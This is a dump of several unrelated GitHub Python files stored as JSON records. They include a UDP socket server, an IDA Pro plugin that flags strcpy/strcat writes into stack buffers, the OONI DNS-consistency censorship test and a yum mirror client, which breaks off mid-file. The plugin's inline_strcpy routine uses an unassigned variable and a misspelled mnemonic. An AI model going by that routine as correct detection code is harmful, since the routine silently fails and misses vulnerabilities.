OverflowError):\n PORT = int(input(\"Ju lutem sigurohuni qe PORT te jete nje numer (1024 - 65535): \"))\n socketBinding()\n\n\nsocketBinding()\n\nwhile True:\n try:\n dataRecieved, address = UDPserver.recvfrom(128)\n data = dataRecieved.decode()\n data = data.upper()\n print(\"\\nKerkesa nga klienti me IP: '\" + str(address[0]) + \"', dhe Port: \" + str(address[1]) + \"\\n\" + data)\n\n args = data.split()\n gjatesia = len(args)\n kerkesa = args[0]\n\n if kerkesa == \"TEST\":\n continue\n elif kerkesa == \"IPADDRESS\":\n pergjigjja = \"IP Adresa e klientit eshte: \" + str(IPADDRESS(address))\n UDPserver.sendto(pergjigjja.encode(), address)\n elif kerkesa == \"PORT\":\n pergjigjja = \"Klienti eshte duke perdorur portin: \" + str(PORTI(address))\n UDPserver.sendto(pergjigjja.encode(), address)\n elif kerkesa == \"TIME\":\n UDPserver.sendto(str(TIME()).encode(), address)\n elif kerkesa == \"GAME\":\n UDPserver.sendto(GAME().encode(), address)\n elif kerkesa == \"EXIT\":\n print(\"Lidhja me klientin eshte shkeputur.\")\n continue\n elif kerkesa == \"COUNT\":\n text = data[len(kerkesa):]\n UDPserver.sendto(COUNT(text).encode(), address)\n elif kerkesa == \"REVERSE\":\n text = data[len(kerkesa):]\n UDPserver.sendto(REVERSE(text).encode(), address)\n elif kerkesa == \"PALINDROME\":\n text = args[1]\n UDPserver.sendto(PALINDROME(text).encode(), address)\n elif kerkesa == \"CONVERT\":\n number = float(args[1])\n option = args[2]\n UDPserver.sendto(CONVERT(number, option).encode(), address)\n elif kerkesa == \"GCF\":\n x = (int)(args[1])\n y = (int)(args[2])\n UDPserver.sendto(GCF(x, y).encode(), address)\n elif kerkesa == \"CALCULATE\":\n x = args[1]\n op = args[2]\n if gjatesia > 3: # kjo eshte bere per shkak se sqrt kerkon vetem nje numer dhe operatorin\n y = args[3]\n UDPserver.sendto(str(CALCULATE(x, op, y)).encode(), address)\n elif gjatesia == 3:\n UDPserver.sendto(str(CALCULATE(x, op)).encode(), address)\n elif kerkesa == \"PASSWORD\":\n gjatesia = args[1]\n UDPserver.sendto(str(password(gjatesia)).encode(), address)\n except (ConnectionError, ConnectionRefusedError, ConnectionAbortedError, ConnectionResetError) as err:\n print(\"Server side error... \", err)\n","repo_name":"ylber-gashi/Socket-Programming-with-Python","sub_path":"FIEK UDP/FIEK_UDP_Server.py","file_name":"FIEK_UDP_Server.py","file_ext":"py","file_size_in_byte":6560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30341598147","text":"import unittest\n\nfrom pandas import DataFrame\n\nfrom materialscoord.plot import plot_benchmark_scores\n\n\nclass PlotTest(unittest.TestCase):\n \"\"\"Test plotting functions.\"\"\"\n\n def test_plot(self):\n \"\"\"Simple test to check the plot function doesn't error.\"\"\"\n data = {\n \"EconNN\": {\"test_structure\": 2.0, \"Total\": 2.0},\n \"MinimumVIRENN\": {\"test_structure\": 2.0, \"Total\": 2.0},\n }\n scores = DataFrame(data=data)\n plt = plot_benchmark_scores(scores)\n self.assertNotEqual(plt, None)\n","repo_name":"hackingmaterials/materials-coord","sub_path":"materialscoord/tests/test_plot.py","file_name":"test_plot.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"53"} +{"seq_id":"73216241449","text":"'''从staple和drinks中各选一个数,和不超过x,共有多少选法 (mod 1000000007)'''\nfrom typing import List\nclass Solution:\n def breakfastNumber(self, staple: List[int], drinks: List[int], x: int) -> int:\n staple.sort()\n drinks.sort()\n ns, nd = len(staple), len(drinks)\n ks, kd = 0, nd - 1\n res = 0\n while ks < ns and kd >= 0 :\n while kd >=0 and staple[ks] + drinks[kd] > x :\n kd -= 1\n res = (res + (kd + 1)) % 1000000007\n ks += 1\n return res\n\n\nstaple = [2,1,1]\ndrinks = [9,8,5,1]\nx = 9\nprint(Solution().breakfastNumber(staple, drinks, x))\n\n","repo_name":"pwl607/LeetCodeSolutions","sub_path":"LCP 18. 早餐组合.py","file_name":"LCP 18. 早餐组合.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20017213950","text":"from idaapi import *\nfrom idc import *\nfrom idautils import *\n\n\n# 动态获取cpu位数\ndef get_arch_dynamic():\n idainfo = get_inf_structure()\n if idainfo.is_64bit():\n return 64\n elif idainfo.is_32bit():\n return 32\n else:\n return 0\n\n# 获取函数的可引用地址\n\n\ndef GetFuncAddr(func):\n addr = get_name_ea_simple(func)\n if addr == BADADDR:\n return addr\n segm = get_segm_name(addr)\n if segm == \"extern\":\n # extern地址交叉引用地址属于.got.plt或.got\n addr = get_first_dref_to(addr)\n if addr != BADADDR:\n segm = get_segm_name(addr)\n if segm not in [\".got.plt\", \".got\"]:\n return BADADDR\n # got表的交叉引用地址在plt段\n addr = get_first_dref_to(addr)\n if addr != BADADDR:\n segm = get_segm_name(addr)\n if segm != \".plt\":\n return BADADDR\n elif segm != \".text\":\n addr = BADADDR\n return addr\n\n# 判断栈的大小是否足够大\n\n\ndef frame_size(func):\n # 可能出现栈溢出的变量大小,最小阈值\n minsize = 16\n # 遍历所有函数\n flags = get_func_attr(func, FUNCATTR_FLAGS)\n if not (flags & FUNC_FRAME):\n return -1\n prev_count = -1\n frame_counter = 0\n prev_var = None\n stack_frame = get_func_attr(func, FUNCATTR_FRAME)\n if stack_frame == -1:\n return -1\n # 获取栈的大小\n frame_size = get_struc_size(stack_frame)\n print(\"[*] function address : %s, frame_size: %d\" %\n (hex(func), frame_size))\n if stack_frame < minsize:\n return -1\n # 遍历每个变量,将足够大的变量打印出来\n flag = 0\n while frame_counter < frame_size:\n stack_var = get_member_name(stack_frame, frame_counter)\n if stack_var is not None:\n if prev_count != -1:\n member_size = frame_counter - prev_count\n if member_size >= minsize:\n print(\"[*] function name : %s -> stack variable: %s (%d bytes)\" %\n (get_func_name(func), prev_var, member_size))\n flag = 1\n prev_count = frame_counter\n prev_var = stack_var\n frame_counter += get_member_size(stack_frame, frame_counter)\n else:\n frame_counter = frame_counter + 1\n if flag == 1:\n return 1\n return -1\n\n\ndef get_arg(addr, arg_num, bits):\n # 64位传参寄存器\n if(\"ELF\" in get_file_type_name()):\n arg_list_x64 = [\"rdi\", \"rsi\", \"rdx\", \"rcx\", \"r8\", \"r9\"]\n arg_list_x64_2 = [\"edi\", \"esi\", \"edx\", \"ecx\", \"r8\", \"r9\"]\n elif(\"PE\" in get_file_type_name()):\n arg_list_x64 = [\"rcx\", \"rdx\", \"r8\", \"r9\"]\n arg_list_x64_2 = [\"ecx\", \"edx\", \"r8\", \"r9\"]\n\n func_start = get_func_attr(addr, FUNCATTR_START)\n arg_count = -1\n while True:\n # 向前遍历指令\n addr = prev_head(addr)\n # 获取指令助记符\n mnem = print_insn_mnem(addr)\n if mnem in (\"ret\", \"retn\", \"jmp\", \"b\") or addr < func_start:\n return -1\n # 获取函数指定参数\n if bits == 32:\n if mnem == \"push\":\n arg_count += 1\n if arg_count == arg_num:\n return print_operand(addr, 0)\n elif mnem in [\"mov\", \"lea\"]:\n if \"[esp]\" in print_operand(addr, 0):\n arg_count += 1\n if arg_count == arg_num:\n return print_operand(addr, 1)\n elif bits == 64:\n if mnem in [\"mov\", \"lea\"]:\n if print_operand(addr, 0) in [arg_list_x64[arg_num], arg_list_x64_2[arg_num]]:\n return print_operand(addr, 1)\n\n\n# 判断参数是否是栈变量\ndef is_stack_buffer(addr, idx):\n inst = DecodeInstruction(addr)\n ret = get_stkvar(inst, inst[idx], inst[idx].addr)\n return ret\n\n# 检测内联strcpy和strcat\n\n\ndef inline_strcpy(bits):\n ea = 0\n while ea != BADADDR:\n addr = find_text(ea+2, SEARCH_DOWN | SEARCH_NEXT, 0, 0, \"rep movsd\")\n ea = addr\n # rep movsd紧接着movesb\n if \"movesb\" in GetDisasm(addr+7):\n opnd = \"edi\"\n if bits == 64:\n opnd = \"rdi\"\n func_start = get_func_attr(_addr, FUNCATTR_START)\n if frame_size(func_start) < 0:\n continue\n while True:\n _addr = prev_head(_addr)\n mnem = print_insn_mnem(_addr)\n operand = print_operand(_addr, 0)\n if mnem in (\"ret\", \"retn\", \"jmp\", \"b\") or _addr < func_start:\n break\n elif mnem == \"lea\" and operand == opnd:\n if is_stack_buffer(_addr, 1):\n print(\"[!] stack buffer strcpy found at \", hex(addr))\n break\n else:\n break\n elif mnem == \"mov\" and operand == opnd:\n op_type = get_operand_type(_addr, 1)\n if op_type == o_reg:\n opnd = print_operand(_addr, 1)\n addr = _addr\n else:\n break\n\n\n# 检测缓冲区溢出主函数\ndef check_stack(bits):\n if bits not in [32, 64]:\n print(\"unknown bits\")\n return\n # 缓冲区溢出危险函数\n danger_funcs = {\n \"strcpy\": 0,\n \"strcat\": 0\n }\n func_no_count = 0\n for func, arg_num in danger_funcs.items():\n addr = GetFuncAddr(func)\n if addr == BADADDR:\n func_no_count += 1\n if func_no_count == len(danger_funcs):\n print(\n \"[*] This file does not call any known buffer overflow hazard functions!\")\n continue\n print(\"[*] %s Referenceable address %s\" % (func, hex(addr)))\n xrefs = CodeRefsTo(addr, 0)\n for ref in xrefs:\n print(\"[+]\", hex(ref), GetDisasm(ref))\n func_start = get_func_attr(ref, FUNCATTR_START)\n if frame_size(func_start) < 0:\n continue\n opnd = get_arg(ref, arg_num, bits)\n if opnd == -1:\n continue\n addr = ref\n while True:\n addr = prev_head(addr)\n mnem = print_insn_mnem(addr)\n operand = print_operand(addr, 0)\n if mnem in (\"ret\", \"retn\", \"jmp\", \"b\") or addr < func_start:\n break\n elif mnem == \"lea\":\n if (operand == opnd or (operand[1:] == opnd[1:] and operand[0] in ['r', 'e'] and opnd[0] in ['r', 'e'])):\n if is_stack_buffer(addr, 1):\n print(\"[!] stack buffer strcpy found at \", hex(addr))\n break\n elif mnem == \"mov\":\n if (operand == opnd or (operand[1:] == opnd[1:] and operand[0] in ['r', 'e'] and opnd[0] in ['r', 'e'])):\n op_type = get_operand_type(addr, 1)\n if op_type == o_reg:\n opnd = print_operand(addr, 1)\n else:\n break\n\n\nclass buffer_overflows(plugin_t):\n flags = PLUGIN_UNL\n comment = \"\"\n help = \"This plugin can check for buffer overflow dangerous functions.\"\n wanted_name = \"Buffer Overflow Functions\"\n wanted_hotkey = \"\"\n\n def init(self):\n return PLUGIN_OK\n\n def run(self, arg):\n print(\"===================================================================\")\n check_stack(get_arch_dynamic())\n\n def term(self):\n pass\n\n\ndef PLUGIN_ENTRY():\n return buffer_overflows()\n","repo_name":"hqz66/IDA_Vulnerability_Detection","sub_path":"buffer_overflows.py","file_name":"buffer_overflows.py","file_ext":"py","file_size_in_byte":7742,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"17544490737","text":"import setuptools\n\nwith open('README.md') as fl:\n l_desc = fl.read()\n\nsetuptools.setup(\n name=\"pyNetSocket\",\n version=\"1.1.5\",\n author=\"AdityaIyer2k7\",\n author_email=\"adityaiyer2007@gmail.com\",\n description=\"A simple networking library for python\",\n long_description=l_desc,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/DrSparky2k7/PyNetSocket\",\n packages=setuptools.find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n keywords=[\n 'networking',\n 'sockets',\n 'simple networking',\n 'simple sockets',\n 'pyNetSockets',\n 'pyNetSocket'\n ],\n python_requires='>=3.6'\n)\n","repo_name":"AdityaIyer2k7/pyNetSocket","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"7577408525","text":"# -*- encoding: utf-8 -*-\n#\n# dnsconsistency\n# **************\n#\n# The test reports censorship if the cardinality of the intersection of\n# the query result set from the control server and the query result set\n# from the experimental server is zero, which is to say, if the two sets\n# have no matching results whatsoever.\n#\n# NOTE: This test frequently results in false positives due to GeoIP-based\n# load balancing on major global sites such as google, facebook, and\n# youtube, etc.\n#\n# :authors: Arturo Filastò, Isis Lovecruft\n# :licence: see LICENSE\n\n\nfrom twisted.python import usage\nfrom twisted.internet import defer\n\nfrom ooni.templates import dnst\n\nfrom ooni.utils import log\n\n\nclass UsageOptions(usage.Options):\n optParameters = [['backend', 'b', None,\n 'The OONI backend that runs the DNS resolver.'],\n ['testresolvers', 'T', None,\n 'File containing list of DNS resolvers to test against.'],\n ['testresolver', 't', None,\n 'Specify a single test resolver to use for testing.']\n ]\n\n\nclass DNSConsistencyTest(dnst.DNSTest):\n\n name = \"DNS Consistency\"\n description = \"Checks to see if the DNS responses from a \"\\\n \"set of DNS resolvers are consistent.\"\n version = \"0.7.0\"\n authors = \"Arturo Filastò, Isis Lovecruft\"\n\n inputFile = ['file', 'f', None,\n 'Input file of list of hostnames to attempt to resolve']\n\n requiredTestHelpers = {'backend': 'dns'}\n requiresRoot = False\n requiresTor = False\n\n usageOptions = UsageOptions\n requiredOptions = ['backend', 'file']\n\n def setUp(self):\n if (not self.localOptions['testresolvers'] and\n not self.localOptions['testresolver']):\n self.test_resolvers = []\n with open('/etc/resolv.conf') as f:\n for line in f:\n if line.startswith('nameserver'):\n self.test_resolvers.append(line.split(' ')[1].strip())\n self.report['test_resolvers'] = self.test_resolvers\n\n elif self.localOptions['testresolvers']:\n test_resolvers_file = self.localOptions['testresolvers']\n\n elif self.localOptions['testresolver']:\n self.test_resolvers = [self.localOptions['testresolver']]\n\n try:\n with open(test_resolvers_file) as f:\n self.test_resolvers = [\n x.split('#')[0].strip() for x in f.readlines()]\n self.report['test_resolvers'] = self.test_resolvers\n f.close()\n\n except IOError as e:\n log.exception(e)\n raise usage.UsageError(\"Invalid test resolvers file\")\n\n except NameError:\n log.debug(\"No test resolver file configured\")\n\n dns_ip, dns_port = self.localOptions['backend'].split(':')\n self.control_dns_server = (str(dns_ip), int(dns_port))\n\n self.report['control_resolver'] = \"%s:%d\" % self.control_dns_server\n\n @defer.inlineCallbacks\n def test_a_lookup(self):\n \"\"\"\n We perform an A lookup on the DNS test servers for the domains to be\n tested and an A lookup on the known good DNS server.\n\n We then compare the results from test_resolvers and that from\n control_resolver and see if they match up.\n If they match up then no censorship is happening (tampering: false).\n\n If they do not we do a reverse lookup (PTR) on the test_resolvers and\n the control resolver for every IP address we got back and check to see\n if anyone of them matches the control ones.\n\n If they do, then we take note of the fact that censorship is probably\n not happening (tampering: reverse-match).\n\n If they do not match then censorship is probably going on (tampering:\n true).\n \"\"\"\n log.msg(\"Doing the test lookups on %s\" % self.input)\n hostname = self.input\n\n self.report['successful'] = []\n self.report['failures'] = []\n self.report['inconsistent'] = []\n\n self.report['errors'] = {}\n\n try:\n control_answers = yield self.performALookup(hostname,\n self.control_dns_server)\n\n if not control_answers:\n log.err(\n \"Got no response from control DNS server %s:%d, \"\n \"perhaps the DNS resolver is down?\" %\n self.control_dns_server)\n self.report['errors'][\n \"%s:%d\" %\n self.control_dns_server] = 'no_answer'\n except:\n self.report['errors'][\n \"%s:%d\" %\n self.control_dns_server] = 'error'\n control_answers = None\n\n for test_resolver in self.test_resolvers:\n log.msg(\"Testing resolver: %s\" % test_resolver)\n test_dns_server = (test_resolver, 53)\n\n try:\n experiment_answers = yield self.performALookup(hostname,\n test_dns_server)\n except Exception:\n log.err(\"Problem performing the DNS lookup\")\n self.report['errors'][test_resolver] = 'dns_lookup_error'\n self.report['failures'].append(test_resolver)\n continue\n\n if not experiment_answers:\n log.err(\"Got no response, perhaps the DNS resolver is down?\")\n self.report['errors'][test_resolver] = 'no_answer'\n self.report['failures'].append(test_resolver)\n continue\n else:\n log.debug(\n \"Got the following A lookup answers %s from %s\" %\n (experiment_answers, test_resolver))\n\n def lookup_details():\n \"\"\"\n A closure useful for printing test details.\n \"\"\"\n log.msg(\"test resolver: %s\" % test_resolver)\n log.msg(\"experiment answers: %s\" % experiment_answers)\n log.msg(\"control answers: %s\" % control_answers)\n\n log.debug(\n \"Comparing %s with %s\" %\n (experiment_answers, control_answers))\n\n if not control_answers:\n log.msg(\"Skipping control resolver comparison\")\n self.report['errors'][test_resolver] = None\n\n elif set(experiment_answers) & set(control_answers):\n lookup_details()\n log.msg(\"tampering: false\")\n self.report['errors'][test_resolver] = False\n self.report['successful'].append(test_resolver)\n else:\n log.msg(\"Trying to do reverse lookup\")\n experiment_reverse = yield self.performPTRLookup(experiment_answers[0],\n test_dns_server)\n control_reverse = yield self.performPTRLookup(control_answers[0],\n self.control_dns_server)\n\n if experiment_reverse == control_reverse:\n log.msg(\"Further testing has eliminated false positives\")\n lookup_details()\n log.msg(\"tampering: reverse_match\")\n self.report['errors'][test_resolver] = 'reverse_match'\n self.report['successful'].append(test_resolver)\n else:\n log.msg(\"Reverse lookups do not match\")\n lookup_details()\n log.msg(\"tampering: true\")\n self.report['errors'][test_resolver] = True\n self.report['inconsistent'].append(test_resolver)\n\n def inputProcessor(self, filename=None):\n \"\"\"\n This inputProcessor extracts domain names from urls\n \"\"\"\n log.debug(\"Running dnsconsistency default processor\")\n if filename:\n fp = open(filename)\n for x in fp.readlines():\n yield x.strip().split('//')[-1].split('/')[0]\n fp.close()\n else:\n pass\n","repo_name":"ooni/probe-legacy","sub_path":"ooni/nettests/blocking/dns_consistency.py","file_name":"dns_consistency.py","file_ext":"py","file_size_in_byte":8208,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"53"} +{"seq_id":"34903596043","text":"#!/usr/bin/env python\n\"\"\"mirror_client.py - Clinet for oVirt CI transactional mirrors\n\"\"\"\nfrom six.moves import StringIO, range\nfrom six.moves.configparser import RawConfigParser\nfrom six.moves.urllib.parse import urlparse, urljoin\nfrom six import MAXSIZE, iteritems, string_types\nimport requests\nfrom requests.exceptions import ConnectionError, Timeout\nfrom os import environ\nimport glob\nimport logging\nimport yaml\nimport re\nfrom collections import Mapping\nfrom time import sleep\nimport argparse\nfrom base64 import b64decode\nimport json\n\nHTTP_TIMEOUT = 30\nHTTP_RETRIES = 3\nHTTP_RETRY_DELAY_SEC = 0.2\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n (mirrors_uri, configs, allow_proxy) = parse_args()\n mirrors_data = mirrors_from_uri(mirrors_uri)\n for conf in configs:\n inject_yum_mirrors_file(mirrors_data, conf, allow_proxy)\n\n\ndef parse_args():\n \"\"\"Parse positional arguments and return their values\"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"mirrors\",\n help=\"Path or URL to a mirrors file.\"\n )\n parser.add_argument(\n \"configs\", nargs='+',\n help=\"A list of yum configs to modify.\"\n )\n parser.add_argument(\n \"-p\", \"--proxy\", action='store_true', default=False,\n help=\"If not specified, proxy will be set to None.\"\n )\n args = parser.parse_args()\n return args.mirrors, args.configs, args.proxy\n\n\ndef inject_yum_mirrors(\n mirrors, yum_cfg, out_cfg, allow_proxy=False, none_value=None\n):\n \"\"\"Inject yum mirrors into the given yum configuration\n\n :param Mapping mirrors: A mapping of mirror names to URLs\n :param file yum_cfg: YUM configuration file object to adjust\n :param file out_cfg: File object to write adjusted configuration into\n :param bool allow_proxy: Wether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n :param str none_value: Specify what is the value to set to the 'proxy'\n configuration option for disabling proxy use. This\n is '_none_' for older (< fc29) distros, and 'None'\n for newer ones. If None (the default) is passed,\n the value will be decided by the repo name suffix\n\n yum_cfg can be read-only, out_cfg should not be the same as yum_cfg.\n\n :returns: None\n \"\"\"\n oldcfg = RawConfigParser()\n newcfg = RawConfigParser()\n _readfp(oldcfg, yum_cfg)\n for section in oldcfg.sections():\n for repoid, baseurl in mirrors.get('before:' + section, []):\n mk_injected_section(\n oldcfg, newcfg, repoid, baseurl, allow_proxy, none_value\n )\n if section not in mirrors:\n copy_section(oldcfg, newcfg, section)\n else:\n mk_injected_section(\n oldcfg, newcfg, section, mirrors[section], allow_proxy,\n none_value\n )\n newcfg.write(out_cfg)\n\n\ndef copy_section(oldcfg, newcfg, section):\n \"\"\"Copy a configuration section between RawConfigParser objects\n\n :param RawConfigParser oldcfg: RawConfigParser to read from\n :param RawConfigParser newcfg: RawConfigParser to write to\n :param str section: The name of the section to copy\n \"\"\"\n if not oldcfg.has_section(section):\n return\n if not newcfg.has_section(section):\n newcfg.add_section(section)\n for option, value in oldcfg.items(section):\n newcfg.set(section, option, value)\n\n\ndef mk_injected_section(\n oldcfg, newcfg, section, baseurl, allow_proxy=False, none_value=None\n):\n \"\"\"Make a configuration section with injected mirror URL\n\n :param RawConfigParser oldcfg: RawConfigParser to take existing\n configuration values from\n :param RawConfigParser newcfg: RawConfigParser to write configuration\n section into\n :param str section: The name of the configuration section to\n make\n :param str baseurl: The mirror URL to inject\n :param bool allow_proxy: Wether to allow accessing the mirrors via\n HTTP proxies (defaults to False)\n :param str none_value: Specify the 'no-proxy' value - see docstring\n for inject_yum_mirrors for full explanation\n \"\"\"\n copy_section(oldcfg, newcfg, section)\n if not newcfg.has_section(section):\n newcfg.add_section(section)\n if none_value is None:\n none_value_str = none_value_by_repo_name(section)\n else:\n none_value_str = str(none_value)\n newcfg.set(section, 'baseurl', baseurl)\n newcfg.remove_option(section, 'mirrorlist')\n newcfg.remove_option(section, 'metalink')\n if not allow_proxy:\n newcfg.set(section, 'proxy', none_value_str)\n\n\ndef _readfp(cp, fp, filename=None):\n \"\"\"Fix Python 3.2+ compatibility\n\n RawConfigParser.readfp had been renamed to read_file in Python 3.2\n \"\"\"\n if hasattr(cp, 'read_file'):\n return cp.read_file(fp, filename)\n else:\n return cp.readfp(fp, filename)\n\n\ndef none_value_by_repo_name(repo_name):\n \"\"\"Auto-detect the no-proxy value from the repo name\n\n :param str repo_name: The name of the repo as appears in square brackets in\n the yum configuration file\n\n :rtype: str\n :returns: If the name of the repo ends witha distro suffix for a distro\n older then fc29, returns '_none_', otherwise returns 'None'\n \"\"\"\n m = re.search('-(?Pfc|el)(?P[0-9]+)$', repo_name)\n if not m:\n return 'None'\n newer_distros = {'fc': 29}\n if newer_distros.get(m.group('distro'), MAXSIZE) <= int(m.group('version')):\n return 'None'\n else:\n return '_none_'\n\n\ndef inject_yum_mirrors_str(\n mirrors, yum_cfg_str, allow_proxy=False, none_value=None\n):\n \"\"\"Inject yum mirrors into the given yum configuration string\n\n :param Mapping mirrors: A mapping of mirror names to URLs\n :param str yum_cfg: YUM configuration string to adjust\n :param bool allow_proxy: Wether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n :param str none_value: Specify the 'no-proxy' value - see docstring for\n inject_yum_mirrors for full explanation\n :rtype: str\n :returns: A string of the adjusted configuration\n \"\"\"\n out_cfg = StringIO()\n inject_yum_mirrors(\n mirrors, StringIO(yum_cfg_str), out_cfg, allow_proxy, none_value\n )\n out_cfg.seek(0)\n return out_cfg.read()\n\n\ndef inject_yum_mirrors_file(\n mirrors, file_name, allow_proxy=False, none_value=None\n):\n \"\"\"Inject yum mirrors into the given yum configuration file\n\n :param Mapping mirrors: A mapping of mirror names to URLs\n :param str file_name: YUM configuration file to adjust\n :param bool allow_proxy: Wether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n\n :param str none_value: Specify the 'no-proxy' value - see docstring for\n inject_yum_mirrors for full explanation\n :returns: None\n \"\"\"\n with open(file_name, 'r') as rf:\n with open(file_name, 'r+') as wf:\n inject_yum_mirrors(mirrors, rf, wf, allow_proxy, none_value)\n wf.truncate()\n logger.info('Injected mirrors into: {0}'.format(file_name))\n\n\ndef inject_yum_mirrors_file_by_pattern(\n mirrors, file_pattern, allow_proxy=False, none_value=None\n):\n \"\"\"Inject yum mirrors into the given yum configuration file\n\n :param Mapping mirrors: A mapping of mirror names to URLs\n :param str file_pattern: YUM configuration file glob pattern to adjust\n :param bool allow_proxy: Wether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n :param str none_value: Specify the 'no-proxy' value - see docstring for\n inject_yum_mirrors for full explanation\n :returns: None\n \"\"\"\n for file_name in glob.glob(file_pattern):\n inject_yum_mirrors_file(mirrors, file_name, allow_proxy, none_value)\n\n\ndef mirrors_from_http(\n url='http://mirrors-wdc.ovirt.org/repos/yum/all_latest.json',\n json_varname='latest_ci_repos',\n allow_proxy=False,\n none_value=None\n):\n \"\"\"Load mirrors from given URL\n\n :param str url: Where to find mirrors JSON file\n :param str json_varname: The variable in the file pointing to the mirror\n dictionary\n :param bool allow_proxy: Wether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n\n :rtype: dict\n :returns: Loaded mirrors data or an empty dict if could not be loaded\n \"\"\"\n if allow_proxy:\n proxies = dict()\n else:\n proxies = dict(http=None, https=None)\n try:\n loop_exception = None\n for attempt in range(0, HTTP_RETRIES):\n try:\n resp = requests.get(url, proxies=proxies, timeout=HTTP_TIMEOUT)\n if resp.status_code == 200:\n return resp.json().get(json_varname, dict())\n else:\n return dict()\n except ValueError as e:\n # When JSON parsing fails we get a ValueError\n loop_exception = e\n logger.warning(\n 'Encountered error getting data from mirrors server' +\n ' in attempt {0}/{1}'.format(attempt, HTTP_RETRIES)\n )\n # Sleep a short while to let server sort its issues\n sleep(HTTP_RETRY_DELAY_SEC)\n else:\n raise loop_exception\n except ConnectionError:\n logger.warning('Failed to connect to mirrors server')\n return dict()\n except Timeout:\n logger.warning('Timed out connecting to mirrors server')\n return dict()\n\n\ndef mirrors_from_file(file_name):\n \"\"\"Load mirrors from a local file\n\n :param str filename: The file to load mirrors from\n\n The file can be JNOS or YAML formatted\n\n :rtype: dict\n \"\"\"\n data = None\n with open(file_name, 'r') as f:\n data = yaml.safe_load(f)\n if not isinstance(data, Mapping):\n raise ValueError(\"Invalid mirrors data in '{0}'\".format(file_name))\n return data\n\n\ndef mirrors_from_data_url(url):\n \"\"\"Load mirrors from a data URL\n\n :param str url: The data URL to get mirrors from\n\n Accepted data URLs have the following syntax:\n\n data:application/json[;base64],\n\n Where if `;base64` is present the data would be base64 encoded, otherwise\n it would be in plain text.\n\n :rtype: dict\n :returs: The mirror data embedded in the URL\n \"\"\"\n PREFIX = 'data:application/json'\n PLAIN_PREFIX = PREFIX + ','\n B64_PREFIX = PREFIX + ';base64,'\n if url.startswith(PLAIN_PREFIX):\n js = url[len(PLAIN_PREFIX):]\n elif url.startswith(B64_PREFIX):\n js = b64decode(url[len(B64_PREFIX):])\n else:\n return {}\n return json.loads(js)\n\n\ndef mirrors_from_uri(uri, json_varname='latest_ci_repos', allow_proxy=False):\n \"\"\"Load mirrors from URI\n\n :param str uri: The URI to mirrors JSON file\n :param str json_varname: The variable in the file pointing to the mirror\n dictionary\n :param bool allow_proxy: Wether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n\n :rtype: dict\n :returns: Loaded mirrors data or an empty dict if could not be loaded\n \"\"\"\n parsed = urlparse(uri)\n if parsed.scheme == 'http' or parsed.scheme == 'https':\n mirrors = mirrors_from_http(parsed.geturl(), json_varname, allow_proxy)\n elif parsed.scheme == '' or parsed.scheme == 'file':\n mirrors = mirrors_from_file(parsed.path)\n elif parsed.scheme == 'data':\n mirrors = mirrors_from_data_url(uri)\n mirrors = normalize_mirror_urls(mirrors, uri)\n mirrors = parse_mirror_includes(mirrors, json_varname, allow_proxy)\n return mirrors\n\n\ndef parse_mirror_includes(\n mirrors, json_varname='latest_ci_repos', allow_proxy=False\n):\n \"\"\"Parse and implement includes in the mirrors data\n\n :param Mapping mirrors: Mirrors data with or without includes\n :param str json_varname: The variable in the file pointing to the mirror\n dictionary\n :param bool allow_proxy: Wether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n\n Includes can be specified in mirrors data in two ways:\n 1. Adding an 'include:' key that points to list of URLs. Data is read from\n Each one of the URLs in the list and merged into the resulting mirrors\n data\n 2. Adding an 'include:before:' key that points to a list of name-url pairs.\n The data will be read from the URLs and then converted to insertion\n statements before the repos that start with `name`.\n\n :rtype: dict\n :returns: copy of the data in `mirrors` with all includes converted to\n included data\n \"\"\"\n parsed = {\n k: v for k, v in iteritems(mirrors) if not k.startswith('include:')\n }\n for uri in mirrors.get('include:', []):\n parsed = merge_mirrors(\n parsed, mirrors_from_uri(uri, json_varname, allow_proxy)\n )\n for repo_name, uri in mirrors.get('include:before:', []):\n parsed = merge_mirrors(parsed, mirrors_to_inserts(\n mirrors_from_uri(uri, json_varname, allow_proxy), repo_name\n ))\n return parsed\n\n\ndef merge_mirrors(a, b):\n \"\"\"Merge mirror data\n\n Merge the mirror data in b into the data in a so that:\n - A repo that is defined both in 'a' and 'b' remains with the URL defined\n in 'a'\n - When insertions to the same repo exist both in 'a' and 'b', the\n insertions from 'b' are added after the insertions from 'a'\n\n :rtype: dict\n \"\"\"\n merged = dict(a)\n for repo_name, repo_url in iteritems(b):\n if repo_name not in merged:\n merged[repo_name] = repo_url\n continue\n if ':' in repo_name:\n merged[repo_name].extend(repo_url)\n return merged\n\n\ndef mirrors_from_environ(\n env_varname='CI_MIRRORS_URL',\n json_varname='latest_ci_repos',\n allow_proxy=False,\n):\n \"\"\"Load mirrors from URL given in an environment variable\n\n :param str env_varname: The environment variable containing URL to mirrors\n JSON file\n :param str json_varname: The variable in the file pointing to the mirror\n dictionary\n :param bool allow_proxy: Wether to allow accessing the mirrors via HTTP\n proxies (defaults to False)\n\n :rtype: dict\n :returns: Loaded mirrors data or an empty dict if could not be loaded or\n the environment variable was not defined\n \"\"\"\n if env_varname not in environ:\n return dict()\n return mirrors_from_uri(environ[env_varname])\n\n\ndef normalize_mirror_urls(mirrors, base_uri):\n \"\"\"Turn 